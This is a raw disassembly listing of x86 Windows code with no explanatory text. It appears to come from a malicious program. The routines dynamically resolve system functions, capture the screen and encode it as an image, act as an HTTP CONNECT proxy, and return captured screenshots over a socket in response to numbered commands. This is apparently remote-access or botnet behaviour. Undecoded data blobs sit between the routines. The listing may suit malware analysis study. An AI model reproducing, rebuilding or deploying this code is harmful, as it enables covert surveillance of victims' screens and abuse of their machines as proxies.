cmp al, 4
jnz short loc_418A79
push 0
loc_418A73: ; CODE XREF: .data:00418A6B�j
call sub_41B89D
pop ecx
loc_418A79: ; CODE XREF: .data:00418A58�j
; .data:00418A63�j ...
push dword ptr [esi+4]
call sub_41A83D
push esi
call sub_41A83D
dec dword_40FAB4
pop ecx
pop ecx
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_418A96 proc near ; CODE XREF: sub_415DD5+4D�p
; .data:004196C5�p
var_B0 = byte ptr -0B0h
var_A0 = byte ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 0B0h
mov eax, dword_40FB34
push esi
push edi
push dword ptr [eax+98h]
call dword_40FD08 ; LoadLibraryA
mov edi, eax
mov eax, dword_40FB34
push dword ptr [eax+0A8h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_14], eax
mov eax, dword_40FB34
push dword ptr [eax+0ACh]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_44], eax
mov eax, dword_40FB34
push dword ptr [eax+0B0h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_40], eax
mov eax, dword_40FB34
push dword ptr [eax+0B4h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_2C], eax
mov eax, dword_40FB34
push dword ptr [eax+0B8h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_4C], eax
mov eax, dword_40FB34
push dword ptr [eax+0BCh]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_38], eax
mov eax, dword_40FB34
push dword ptr [eax+0C0h]
push edi
call dword_40FD04 ; GetProcAddress
xor esi, esi
cmp edi, esi
mov [ebp+6Ch+var_58], eax
jz loc_418F52
cmp [ebp+6Ch+var_14], esi
jz loc_418F52
cmp [ebp+6Ch+var_44], esi
jz loc_418F52
cmp [ebp+6Ch+var_40], esi
jz loc_418F52
cmp [ebp+6Ch+var_2C], esi
jz loc_418F52
cmp [ebp+6Ch+var_4C], esi
jz loc_418F52
cmp [ebp+6Ch+var_38], esi
jz loc_418F52
cmp eax, esi
jz loc_418F52
mov eax, dword_40FB34
push dword ptr [eax+9Ch]
call dword_40FD08 ; LoadLibraryA
mov edi, eax
mov eax, dword_40FB34
push dword ptr [eax+0C4h]
push edi
call dword_40FD04 ; GetProcAddress
cmp edi, esi
mov [ebp+6Ch+var_50], eax
jz loc_418F52
cmp eax, esi
jz loc_418F52
mov eax, dword_40FB34
push dword ptr [eax+0A0h]
call dword_40FD08 ; LoadLibraryA
mov edi, eax
mov eax, dword_40FB34
push dword ptr [eax+0C8h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_C], eax
mov eax, dword_40FB34
push dword ptr [eax+0CCh]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_18], eax
mov eax, dword_40FB34
push dword ptr [eax+0D0h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_10], eax
mov eax, dword_40FB34
push dword ptr [eax+0D4h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_8], eax
mov eax, dword_40FB34
push dword ptr [eax+0D8h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_28], eax
mov eax, dword_40FB34
push dword ptr [eax+0DCh]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_48], eax
mov eax, dword_40FB34
push dword ptr [eax+0E0h]
push edi
call dword_40FD04 ; GetProcAddress
mov [ebp+6Ch+var_34], eax
mov eax, dword_40FB34
push dword ptr [eax+0E4h]
push edi
call dword_40FD04 ; GetProcAddress
cmp edi, esi
mov [ebp+6Ch+var_3C], eax
jz loc_418F52
cmp [ebp+6Ch+var_C], esi
jz loc_418F52
cmp [ebp+6Ch+var_18], esi
jz loc_418F52
cmp [ebp+6Ch+var_10], esi
jz loc_418F52
cmp [ebp+6Ch+var_8], esi
jz loc_418F52
cmp [ebp+6Ch+var_28], esi
jz loc_418F52
cmp [ebp+6Ch+var_48], esi
jz loc_418F52
cmp [ebp+6Ch+var_34], esi
jz loc_418F52
cmp eax, esi
jz loc_418F52
push ebx
mov bx, [ebp+6Ch+arg_8]
cmp bx, si
mov [ebp+6Ch+var_1C], esi
mov [ebp+6Ch+var_8C], 1
mov [ebp+6Ch+var_88], esi
mov [ebp+6Ch+var_84], esi
mov [ebp+6Ch+var_80], esi
jnz short loc_418CFD
call sub_41B588
test al, al
jz loc_418F4C
loc_418CFD: ; CODE XREF: sub_418A96+258�j
push esi
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_54]
push eax
call [ebp+6Ch+var_14]
test eax, eax
jnz loc_418F4C
mov eax, dword_40FB34
push esi
push esi
push esi
push dword ptr [eax+0A4h]
call [ebp+6Ch+var_C]
push eax
mov [ebp+6Ch+var_C], eax
call [ebp+6Ch+var_18]
push 7F00h
push esi
mov [ebp+6Ch+var_18], eax
mov [ebp+6Ch+var_20], esi
mov [ebp+6Ch+var_24], esi
call dword_40FB1C
lea ecx, [ebp+6Ch+var_A0]
push ecx
push eax
mov [ebp+6Ch+var_14], eax
call dword_40FB28
lea eax, [ebp+6Ch+var_24]
push eax
call dword_40FB20
cmp bx, si
jz short loc_418D63
movzx edi, bx
mov [ebp+6Ch+var_4], edi
jmp short loc_418D78
; ---------------------------------------------------------------------------
loc_418D63: ; CODE XREF: sub_418A96+2C3�j
push 8
push [ebp+6Ch+var_C]
call [ebp+6Ch+var_10]
push 0Ah
push [ebp+6Ch+var_C]
mov edi, eax
call [ebp+6Ch+var_10]
mov [ebp+6Ch+var_4], eax
loc_418D78: ; CODE XREF: sub_418A96+2CB�j
push [ebp+6Ch+var_4]
push edi
push [ebp+6Ch+var_C]
call [ebp+6Ch+var_8]
cmp eax, esi
mov [ebp+6Ch+var_30], eax
jz loc_418F3A
push eax
push [ebp+6Ch+var_18]
call [ebp+6Ch+var_28]
mov [ebp+6Ch+var_5C], eax
xor eax, eax
xor ecx, ecx
cmp bx, si
jz short loc_418DB5
mov eax, [ebp+6Ch+var_24]
mov ecx, [ebp+6Ch+var_20]
movzx edx, bx
shr edx, 1
sub eax, edx
sub [ebp+6Ch+var_24], eax
sub ecx, edx
sub [ebp+6Ch+var_20], ecx
loc_418DB5: ; CODE XREF: sub_418A96+308�j
push 40CC0020h
push ecx
push eax
push [ebp+6Ch+var_C]
push [ebp+6Ch+var_4]
push edi
push esi
push esi
push [ebp+6Ch+var_18]
call [ebp+6Ch+var_48]
push [ebp+6Ch+var_14]
mov eax, [ebp+6Ch+var_20]
sub eax, [ebp+6Ch+var_98]
push eax
mov eax, [ebp+6Ch+var_24]
sub eax, [ebp+6Ch+var_9C]
push eax
push [ebp+6Ch+var_18]
call dword_40FB24
lea eax, [ebp+6Ch+var_10]
push eax
push esi
push [ebp+6Ch+var_30]
mov [ebp+6Ch+var_10], esi
call [ebp+6Ch+var_40]
test eax, eax
jnz loc_418F2B
cmp [ebp+6Ch+var_10], esi
jz loc_418F2B
lea eax, [ebp+6Ch+var_8]
push eax
lea eax, [ebp+6Ch+var_4]
push eax
mov [ebp+6Ch+var_4], esi
mov [ebp+6Ch+var_8], esi
call [ebp+6Ch+var_4C]
test eax, eax
jnz loc_418F25
cmp [ebp+6Ch+var_8], esi
jz loc_418F25
cmp [ebp+6Ch+var_4], esi
jz loc_418F25
push [ebp+6Ch+var_8]
call sub_41A81F
mov ebx, eax
cmp ebx, esi
pop ecx
jz loc_418F25
push ebx
push [ebp+6Ch+var_8]
push [ebp+6Ch+var_4]
call [ebp+6Ch+var_38]
xor edi, edi
cmp [ebp+6Ch+var_4], esi
jbe short loc_418E8E
lea eax, [ebx+30h]
mov [ebp+6Ch+var_14], eax
loc_418E59: ; CODE XREF: sub_418A96+3DD�j
mov eax, [ebp+6Ch+var_14]
push dword ptr [eax]
push [ebp+6Ch+arg_0]
call dword_40FD88 ; lstrcmpiW
test eax, eax
jz short loc_418E77
add [ebp+6Ch+var_14], 4Ch
inc edi
cmp edi, [ebp+6Ch+var_4]
jb short loc_418E59
jmp short loc_418E8E
; ---------------------------------------------------------------------------
loc_418E77: ; CODE XREF: sub_418A96+3D3�j
imul edi, 4Ch
push 10h
add edi, ebx
lea eax, [ebp+6Ch+var_B0]
push edi
push eax
call sub_41A857
add esp, 0Ch
mov [ebp+6Ch+var_8], esi
loc_418E8E: ; CODE XREF: sub_418A96+3BB�j
; sub_418A96+3DF�j
push ebx
call sub_41A83D
cmp [ebp+6Ch+var_8], esi
pop ecx
jnz loc_418F25
lea eax, [ebp+6Ch+var_1C]
push eax
xor edi, edi
inc edi
push edi
push esi
call [ebp+6Ch+var_50]
test eax, eax
jnz short loc_418F25
cmp [ebp+6Ch+var_1C], esi
jz short loc_418F25
cmp [ebp+6Ch+arg_4], esi
mov [ebp+6Ch+var_7C], esi
jbe short loc_418EF6
push 10h
lea eax, [ebp+6Ch+var_78]
push offset dword_401380
push eax
call sub_41A857
mov eax, [ebp+6Ch+var_7C]
imul eax, 1Ch
mov [ebp+eax+6Ch+var_64], 4
mov eax, [ebp+6Ch+var_7C]
imul eax, 1Ch
mov [ebp+eax+6Ch+var_68], edi
mov eax, [ebp+6Ch+var_7C]
imul eax, 1Ch
lea ecx, [ebp+6Ch+arg_4]
add esp, 0Ch
mov [ebp+eax+6Ch+var_60], ecx
inc [ebp+6Ch+var_7C]
loc_418EF6: ; CODE XREF: sub_418A96+423�j
lea eax, [ebp+6Ch+var_7C]
push eax
lea eax, [ebp+6Ch+var_B0]
push eax
push [ebp+6Ch+var_1C]
push [ebp+6Ch+var_10]
call [ebp+6Ch+var_58]
test eax, eax
mov eax, [ebp+6Ch+var_1C]
jz short loc_418F19
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
mov [ebp+6Ch+var_1C], esi
jmp short loc_418F25
; ---------------------------------------------------------------------------
loc_418F19: ; CODE XREF: sub_418A96+476�j
mov edx, [eax]
push esi
push esi
push esi
xor ecx, ecx
push ecx
push eax
call dword ptr [edx+14h]
loc_418F25: ; CODE XREF: sub_418A96+381�j
; sub_418A96+38A�j ...
push [ebp+6Ch+var_10]
call [ebp+6Ch+var_2C]
loc_418F2B: ; CODE XREF: sub_418A96+35F�j
; sub_418A96+368�j
push [ebp+6Ch+var_5C]
push [ebp+6Ch+var_18]
call [ebp+6Ch+var_28]
push [ebp+6Ch+var_30]
call [ebp+6Ch+var_34]
loc_418F3A: ; CODE XREF: sub_418A96+2F1�j
push [ebp+6Ch+var_18]
call [ebp+6Ch+var_3C]
push [ebp+6Ch+var_C]
call [ebp+6Ch+var_3C]
push [ebp+6Ch+var_54]
call [ebp+6Ch+var_44]
loc_418F4C: ; CODE XREF: sub_418A96+261�j
; sub_418A96+275�j
mov eax, [ebp+6Ch+var_1C]
pop ebx
jmp short loc_418F54
; ---------------------------------------------------------------------------
loc_418F52: ; CODE XREF: sub_418A96+B7�j
; sub_418A96+C0�j ...
xor eax, eax
loc_418F54: ; CODE XREF: sub_418A96+4BA�j
pop edi
pop esi
add ebp, 6Ch
leave
retn
sub_418A96 endp
; ---------------------------------------------------------------------------
db 55h
dd 8C246C8Dh, 12CEC81h, 56530000h, 100068h, 18ADE800h
dd 758B0000h, 3BDB337Ch, 458959C3h, 56840F68h, 68000001h
dd 445C0h, 458D086Ah, 0E856506Ch, 0FFFFE01Eh, 8310C483h
dd 850F08F8h, 139h, 46C7D80h, 12F850Fh, 7D800000h, 850F016Dh
dd 125h, 62E85653h, 59FFFFE0h, 33535759h, 8D5747FFh, 56507F45h
dd 0FCEC15FFh, 0C73B0040h, 5D380575h, 57E7757Fh, 0E03FE856h
dd 458BFFFFh, 6A595970h, 50458906h, 6E458B66h, 66026A57h
dd 24C45C7h, 45896600h, 6C5D884Eh, 0FCD415FFh, 0F88B0040h
dd 1574FB3Bh, 458D106Ah, 0FF57504Ch, 40FCF815h, 0C6C08500h
dd 745A6D45h, 6D45C604h, 86A535Bh, 506C458Dh, 0BC15FF56h
dd 800040FCh, 0F5A6D7Dh, 8585h, 5C45C700h, 118h, 0EB605D89h
dd 488DFF4Ah, 8BFFFFFFh, 0FFFF4885h, 85848BFFh, 0FFFFFF4Ch
dd 7D89C63Bh, 89037464h, 68536475h, 1000h, 506875FFh, 0FCEC15FFh
dd 0F8830040h, 53477C01h, 6875FF50h, 0FF6475FFh, 40FCBC15h
dd 3932EB00h, 0FFFF489Dh, 8DB675FFh, 53505C45h, 48858D53h
dd 50FFFFFFh, 4885C753h, 2FFFFFFh, 89000000h, 0FFFF4CB5h
dd 50BD89FFh, 0FFFFFFFFh, 40FCF415h, 1F88300h, 0FB3BC97Dh
dd 7D801674h, 9755A6Dh, 0FF57026Ah, 40FCE815h, 15FF5700h
dd 40FCC0h, 6875FF5Fh, 175CE8h, 26A5900h, 0E815FF56h, 560040FCh
dd 0FCC015FFh, 0DFF0040h, 40FAB4h, 0C5835B5Eh, 4C2C974h
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 30h
push esi
push 1000h
call sub_41A81F
mov esi, eax
test esi, esi
pop ecx
jz loc_4193D9
loc_41911D: ; CODE XREF: .data:0041914C�j
push 445C0h
push 0FFFh
push esi
push dword ptr [ebp+8]
call sub_417048
add esp, 10h
test eax, eax
mov [ebp-18h], eax
jle loc_4193B8
cmp eax, 2
jnz short loc_41914E
cmp byte ptr [esi], 0Dh
jnz short loc_41914E
cmp byte ptr [esi+1], 0Ah
jz short loc_41911D
loc_41914E: ; CODE XREF: .data:00419141�j
; .data:00419146�j
add eax, esi
cmp byte ptr [eax-1], 0Ah
jnz loc_4193B8
cmp byte ptr [eax-2], 0Dh
jnz loc_4193B8
push ebx
push edi
push 8
push 8
push offset aConnect ; "CONNECT "
push esi
mov byte ptr [eax], 0
call sub_41A493
add esp, 10h
test eax, eax
setnz byte ptr [ebp-1]
xor edi, edi
cmp byte ptr [ebp-1], 1
push 20h
jnz short loc_4191CA
push esi
call sub_41A633
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_4193B6
inc ebx
cmp byte ptr [ebx], 2Fh
jnz short loc_4191A9
mov byte ptr [ebp-1], 2
jmp short loc_4191DF
; ---------------------------------------------------------------------------
loc_4191A9: ; CODE XREF: .data:004191A1�j
push 7
push 7
push offset aHttp ; "http://"
push ebx
call sub_41A493
add esp, 10h
test eax, eax
jnz loc_4193B6
add ebx, 7
push 2Fh
jmp short loc_4191CD
; ---------------------------------------------------------------------------
loc_4191CA: ; CODE XREF: .data:00419189�j
lea ebx, [esi+8]
loc_4191CD: ; CODE XREF: .data:004191C8�j
push ebx
call sub_41A633
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz loc_4193B6
loc_4191DF: ; CODE XREF: .data:004191A7�j
xor eax, eax
cmp edi, eax
mov [ebp-0Ch], eax
mov [ebp-10h], eax
mov [ebp-14h], eax
mov [ebp-8], eax
mov dword ptr [ebp-20h], 50h
jz short loc_41920E
sub edi, ebx
push edi
push ebx
call sub_41BC6D
test eax, eax
pop ecx
pop ecx
mov [ebp-8], eax
jz loc_4193B6
loc_41920E: ; CODE XREF: .data:004191F6�j
push dword ptr [ebp-18h]
push esi
call sub_41BC6D
push 445C0h
push 0FFFh
push esi
push dword ptr [ebp+8]
mov [ebp-18h], eax
call sub_417048
add esp, 18h
jmp loc_41938C
; ---------------------------------------------------------------------------
loc_419235: ; CODE XREF: .data:00419395�j
cmp edi, 2
jnz short loc_419249
cmp byte ptr [esi], 0Dh
jnz short loc_419249
cmp byte ptr [esi+1], 0Ah
jz loc_4193DE
loc_419249: ; CODE XREF: .data:00419238�j
; .data:0041923D�j
cmp byte ptr [ebp-1], 0
jz short loc_4192AC
cmp edi, 19h
jle short loc_419270
cmp byte ptr [ebp-1], 1
jnz short loc_419270
push 12h
push 12h
push offset aProxyConnectio ; "Proxy-Connection: "
push esi
call sub_41A493
add esp, 10h
test eax, eax
jz short loc_419291
loc_419270: ; CODE XREF: .data:00419252�j
; .data:00419258�j
cmp edi, 10h
jle short loc_4192AC
cmp byte ptr [ebp-1], 2
jnz short loc_4192AC
push 0Ch
push 0Ch
push offset aConnection ; "Connection: "
push esi
call sub_41A493
add esp, 10h
test eax, eax
jnz short loc_4192AC
loc_419291: ; CODE XREF: .data:0041926E�j
xor eax, eax
push eax
push eax
push eax
push edi
push esi
push 0Ch
push offset aKeepAlive ; "*keep-alive*"
call sub_41A221
add esp, 1Ch
jmp loc_419376
; ---------------------------------------------------------------------------
loc_4192AC: ; CODE XREF: .data:0041924D�j
; .data:00419273�j ...
push 6
pop ebx
cmp edi, ebx
jle short loc_4192CB
push ebx
push ebx
push offset aProxy ; "Proxy-"
push esi
call sub_41A493
add esp, 10h
test eax, eax
jz loc_419376
loc_4192CB: ; CODE XREF: .data:004192B1�j
cmp byte ptr [ebp-1], 2
jnz short loc_419304
cmp edi, ebx
jle short loc_419304
push 0FFFFFFFFh
push ebx
push offset aHost ; "Host: "
push esi
call sub_41A493
add esp, 10h
test eax, eax
jnz short loc_419304
lea eax, [edi-8]
push eax
lea eax, [esi+6]
push eax
call sub_41BC6D
test eax, eax
pop ecx
pop ecx
mov [ebp-8], eax
jz loc_41939B
loc_419304: ; CODE XREF: .data:004192CF�j
; .data:004192D3�j ...
cmp edi, 0Fh
jle short loc_41933C
push 0FFFFFFFFh
push 10h
push offset aContentLength ; "Content-Length: "
push esi
call sub_41A493
add esp, 10h
test eax, eax
jnz short loc_41933C
lea eax, [esi+10h]
jmp short loc_419325
; ---------------------------------------------------------------------------
loc_419324: ; CODE XREF: .data:00419328�j
inc eax
loc_419325: ; CODE XREF: .data:00419322�j
cmp byte ptr [eax], 20h
jz short loc_419324
push eax
call sub_41A57A
test eax, eax
pop ecx
mov [ebp-0Ch], eax
jge short loc_41933C
and dword ptr [ebp-0Ch], 0
loc_41933C: ; CODE XREF: .data:00419307�j
; .data:0041931D�j ...
mov eax, [ebp-14h]
lea ebx, [eax+edi]
cmp ebx, 0FFFFh
ja loc_4193DE
lea eax, [ebx+1]
push eax
push dword ptr [ebp-10h]
call sub_41BE45
test eax, eax
pop ecx
pop ecx
jz short loc_4193DE
mov ecx, [ebp-14h]
push edi
add ecx, eax
push esi
push ecx
mov [ebp-10h], eax
call sub_41A857
add esp, 0Ch
mov [ebp-14h], ebx
loc_419376: ; CODE XREF: .data:004192A7�j
; .data:004192C5�j
push 445C0h
push 0FFFh
push esi
push dword ptr [ebp+8]
call sub_417048
add esp, 10h
loc_41938C: ; CODE XREF: .data:00419230�j
mov edi, eax
cmp edi, 1
mov byte ptr [edi+esi], 0
jge loc_419235
loc_41939B: ; CODE XREF: .data:004192FE�j
; .data:004193E2�j
push dword ptr [ebp-8]
call sub_41A83D
push dword ptr [ebp-10h]
loc_4193A6: ; CODE XREF: .data:004195A9�j
call sub_41A83D
push dword ptr [ebp-18h]
call sub_41A83D
add esp, 0Ch
loc_4193B6: ; CODE XREF: .data:00419197�j
; .data:004191BD�j ...
pop edi
pop ebx
loc_4193B8: ; CODE XREF: .data:00419138�j
; .data:00419154�j ...
push esi
call sub_41A83D
pop ecx
push 2
push dword ptr [ebp+8]
call dword_40FCE8
push dword ptr [ebp+8]
call dword_40FCC0
dec dword_40FAB4
loc_4193D9: ; CODE XREF: .data:00419117�j
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_4193DE: ; CODE XREF: .data:00419243�j
; .data:00419348�j ...
cmp dword ptr [ebp-8], 0
jz short loc_41939B
push 3Ah
push dword ptr [ebp-8]
call sub_41A633
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_419408
lea eax, [edi+1]
push eax
call sub_41A57A
pop ecx
movzx eax, ax
mov byte ptr [edi], 0
jmp short loc_41940B
; ---------------------------------------------------------------------------
loc_419408: ; CODE XREF: .data:004193F4�j
mov eax, [ebp-20h]
loc_41940B: ; CODE XREF: .data:00419406�j
push dword ptr [ebp-8]
rol ax, 8
mov word ptr [ebp-30h], 2
mov [ebp-2Eh], ax
call dword_40FCFC
cmp eax, 0FFFFFFFFh
mov [ebp-1Ch], eax
jnz short loc_41944A
push dword ptr [ebp-8]
call dword_40FD00
test eax, eax
jz short loc_41944A
mov eax, [eax+0Ch]
push 4
push dword ptr [eax]
lea eax, [ebp-1Ch]
push eax
call sub_41A857
add esp, 0Ch
loc_41944A: ; CODE XREF: .data:00419428�j
; .data:00419435�j
mov eax, [ebp-1Ch]
push 6
push 1
push 2
mov [ebp-2Ch], eax
call dword_40FCD4
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_41958E
push 10h
lea eax, [ebp-30h]
push eax
push ebx
call dword_40FCF8
test eax, eax
jnz loc_41958E
cmp [ebp-1], al
jnz short loc_41949C
push eax
push 28h
push offset aHttp1_0200Conn ; "HTTP/1.0 200 Connection established\r\n\r\n"...
push dword ptr [ebp+8]
call dword_40FCBC
push esi
push dword ptr [ebp+8]
push ebx
jmp loc_419586
; ---------------------------------------------------------------------------
loc_41949C: ; CODE XREF: .data:0041947F�j
xor edi, edi
push edi
push dword ptr [ebp-18h]
call dword_40FD94 ; lstrlenA
push eax
push dword ptr [ebp-18h]
push ebx
call dword_40FCBC
push edi
push dword ptr [ebp-14h]
push dword ptr [ebp-10h]
push ebx
call dword_40FCBC
push edi
push 2
push offset dword_401314
push ebx
call dword_40FCBC
cmp [ebp-0Ch], edi
jle short loc_41954E
mov [ebp-14h], edi
loc_4194D8: ; CODE XREF: .data:00419500�j
push edi
push 1000h
push esi
push dword ptr [ebp+8]
call dword_40FCEC
cmp eax, 1
jl short loc_41954E
add [ebp-14h], eax
push edi
push eax
push esi
push ebx
call dword_40FCBC
mov eax, [ebp-0Ch]
cmp [ebp-14h], eax
jl short loc_4194D8
jmp short loc_41954E
; ---------------------------------------------------------------------------
loc_419504: ; CODE XREF: .data:0041956B�j
cmp edi, 0Fh
jle short loc_419531
push 0FFFFFFFFh
push 10h
push offset aContentLength ; "Content-Length: "
push esi
call sub_41A493
add esp, 10h
test eax, eax
jnz short loc_419531
lea eax, [esi+10h]
jmp short loc_419525
; ---------------------------------------------------------------------------
loc_419524: ; CODE XREF: .data:00419528�j
inc eax
loc_419525: ; CODE XREF: .data:00419522�j
cmp byte ptr [eax], 20h
jz short loc_419524
push eax
call sub_41A57A
pop ecx
loc_419531: ; CODE XREF: .data:00419507�j
; .data:0041951D�j
cmp edi, 2
jnz short loc_419541
cmp byte ptr [esi], 0Dh
jnz short loc_419541
cmp byte ptr [esi+1], 0Ah
jz short loc_41956F
loc_419541: ; CODE XREF: .data:00419534�j
; .data:00419539�j
push 0
push edi
push esi
push dword ptr [ebp+8]
call dword_40FCBC
loc_41954E: ; CODE XREF: .data:004194D3�j
; .data:004194EB�j ...
push 445C0h
push 0FFFh
push esi
push ebx
call sub_417048
mov edi, eax
add esp, 10h
cmp edi, 1
mov byte ptr [edi+esi], 0
jge short loc_419504
jmp short loc_419581
; ---------------------------------------------------------------------------
loc_41956F: ; CODE XREF: .data:0041953F�j
push 0
push 15h
push offset aConnectionClos ; "Connection: close\r\n\r\n"
push dword ptr [ebp+8]
call dword_40FCBC
loc_419581: ; CODE XREF: .data:0041956D�j
push esi
push ebx
push dword ptr [ebp+8]
loc_419586: ; CODE XREF: .data:00419497�j
call sub_41708E
add esp, 0Ch
loc_41958E: ; CODE XREF: .data:00419461�j
; .data:00419476�j
push 2
push ebx
call dword_40FCE8
push ebx
call dword_40FCC0
push dword ptr [ebp-10h]
call sub_41A83D
push dword ptr [ebp-8]
jmp loc_4193A6
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
mov esi, 2710h
push esi
push 4
pop ebx
push ebx
lea eax, [ebp-10h]
push eax
push dword ptr [ebp+8]
call sub_416FB2
add esp, 10h
cmp eax, ebx
jnz loc_419772
push esi
push ebx
lea eax, [ebp-4]
push eax
push dword ptr [ebp+8]
call sub_416FB2
add esp, 10h
cmp eax, ebx
jnz loc_419772
cmp dword ptr [ebp-4], 0FFFFh
ja loc_419772
push edi
push dword ptr [ebp-4]
call sub_41A81F
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp-0Ch], eax
jz loc_419771
push esi
push dword ptr [ebp-4]
push eax
push dword ptr [ebp+8]
call sub_416FB2
add esp, 10h
cmp eax, [ebp-4]
jnz loc_419768
cmp dword ptr [ebp-10h], 0Ah
jz short loc_419669
cmp dword ptr [ebp-10h], 14h
jnz loc_419768
cmp [ebp-4], ebx
jb loc_419768
push edi
push dword ptr [ebp-4]
push dword ptr [ebp-0Ch]
push dword ptr [ebp+8]
call dword_40FCBC
cmp eax, [ebp-4]
jnz loc_419768
call sub_41B5F2
jmp loc_419768
; ---------------------------------------------------------------------------
loc_419669: ; CODE XREF: .data:00419631�j
mov eax, dword_40FB34
mov dword ptr [ebp-14h], 32h
push dword ptr [eax+88h]
call sub_41BD07
cmp [ebp-4], ebx
pop ecx
mov [ebp-8], eax
jb short loc_4196B5
push ebx
push dword ptr [ebp-0Ch]
lea eax, [ebp-14h]
push eax
call sub_41A857
mov eax, [ebp-4]
add esp, 0Ch
cmp eax, ebx
jbe short loc_4196B5
add eax, 0FFFFFFFCh
push eax
mov eax, [ebp-0Ch]
add eax, 4
push eax
call sub_41BCB7
pop ecx
pop ecx
mov [ebp-8], eax
loc_4196B5: ; CODE XREF: .data:00419687�j
; .data:0041969E�j
cmp [ebp-8], edi
jz loc_419768
push edi
push dword ptr [ebp-14h]
push dword ptr [ebp-8]
call sub_418A96
mov ebx, eax
add esp, 0Ch
cmp ebx, edi
jz loc_41975F
mov eax, [ebx]
push 1
lea ecx, [ebp-5Ch]
push ecx
push ebx
call dword ptr [eax+30h]
test eax, eax
jnz short loc_419759
push edi
push 8
lea eax, [ebp-54h]
push eax
push dword ptr [ebp+8]
mov dword ptr [ebp-50h], 1000h
call dword_40FCBC
push dword ptr [ebp-50h]
call sub_41A81F
mov edi, eax
test edi, edi
pop ecx
jz short loc_419759
loc_41970D: ; CODE XREF: .data:00419750�j
mov eax, [ebx]
lea ecx, [ebp-4]
push ecx
push dword ptr [ebp-50h]
push edi
push ebx
call dword ptr [eax+0Ch]
test eax, eax
jnz short loc_419752
cmp [ebp-4], eax
jz short loc_419752
push eax
push dword ptr [ebp-4]
push edi
push dword ptr [ebp+8]
call dword_40FCBC
cmp eax, 0FFFFFFFFh
jz short loc_419752
push esi
push 4
push edi
push dword ptr [ebp+8]
call sub_416FB2
add esp, 10h
cmp eax, 4
jnz short loc_419752
mov eax, [edi]
cmp eax, [ebp-50h]
jz short loc_41970D
loc_419752: ; CODE XREF: .data:0041971D�j
; .data:00419722�j ...
push edi
call sub_41A83D
pop ecx
loc_419759: ; CODE XREF: .data:004196E5�j
; .data:0041970B�j
mov eax, [ebx]
push ebx
call dword ptr [eax+8]
loc_41975F: ; CODE XREF: .data:004196D1�j
push dword ptr [ebp-8]
call sub_41A83D
pop ecx
loc_419768: ; CODE XREF: .data:00419627�j
; .data:00419637�j ...
push dword ptr [ebp-0Ch]
call sub_41A83D
pop ecx
loc_419771: ; CODE XREF: .data:0041960E�j
pop edi
loc_419772: ; CODE XREF: .data:004195D1�j
; .data:004195EA�j ...
push 2
push dword ptr [ebp+8]
call dword_40FCE8
push dword ptr [ebp+8]
call dword_40FCC0
dec dword_40FAB4
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
dw 8D55h
dd 818C246Ch, 134ECh, 0C0335300h, 45895756h, 5045C74Ch
dd 40FAC0h, 355445C7h, 8900407Ah, 45C75845h, 40FAC25Ch
dd 6045C700h, 407BDBh, 0C7644589h, 0FAC46845h, 45C70040h
dd 4080886Ch, 4C7D8D00h, 37045C7h, 0BB000000h, 0FA0h, 232868h
dd 0CBE85300h, 0F000018h, 0E856F0B7h, 0FFFFD750h, 850CC483h
dd 750789C0h, 0FF286A25h, 40FD6815h, 23286800h, 0E8530000h
dd 18A6h, 56F0B70Fh, 0FFD72BE8h, 0CC483FFh, 0DD74C085h
dd 478B0789h, 0CC78304h, 66704DFFh, 0B0753089h, 3358646Ah
dd 447D89FFh, 50484589h, 0BEE9h, 5A036A00h, 0FF409589h
dd 0C933FFFFh, 8B4C458Dh, 8DB48930h, 0FFFFFF44h, 0CC08341h
dd 0EF72CA3Bh, 5044458Dh, 858D5757h, 0FFFFFF40h, 15FF5750h
dd 40FCF4h, 0FFFF883h, 9684h, 7EC73B00h, 0FF6CEB7Ch, 0FFFF408Dh
